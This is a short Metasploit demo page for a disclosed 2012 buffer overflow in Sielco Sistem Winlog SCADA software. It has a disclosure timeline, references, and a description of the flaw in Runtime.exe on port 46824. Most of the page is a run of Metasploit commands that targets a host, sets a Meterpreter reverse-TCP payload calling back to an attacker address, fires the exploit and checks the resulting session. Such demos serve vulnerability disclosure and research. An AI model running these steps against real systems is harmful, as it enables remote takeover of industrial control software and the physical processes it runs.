Scada Sielco Sistemi Winlog Buffer Overflow 2.07.14 Metasploit Demo

Timeline :

Vulnerability discovered by m-1-k-3 the 2012-06-03
Public release of the vulnerability the 2012-06-04
Metasploit PoC provided the 2012-06-07

PoC provided by :

m-1-k-3

Reference(s) :

EBD-ID-18986
BID-53811

Affected version(s) :

Sielco Sistem Winlog before or equal to version 2.07.14

Tested on Windows XP Pro SP3 with :

Sielco Sistem Winlog 2.07.14

Description :

This module exploits a buffer overflow in Sielco Sistem Winlog before or equal to version 2.07.14. When sending a specially formatted packet to the Runtime.exe service on port 46824, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/scada/winlog_runtime_2
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100

nmap -p 46824 192.168.178.22

exploit

getuid
sysinfo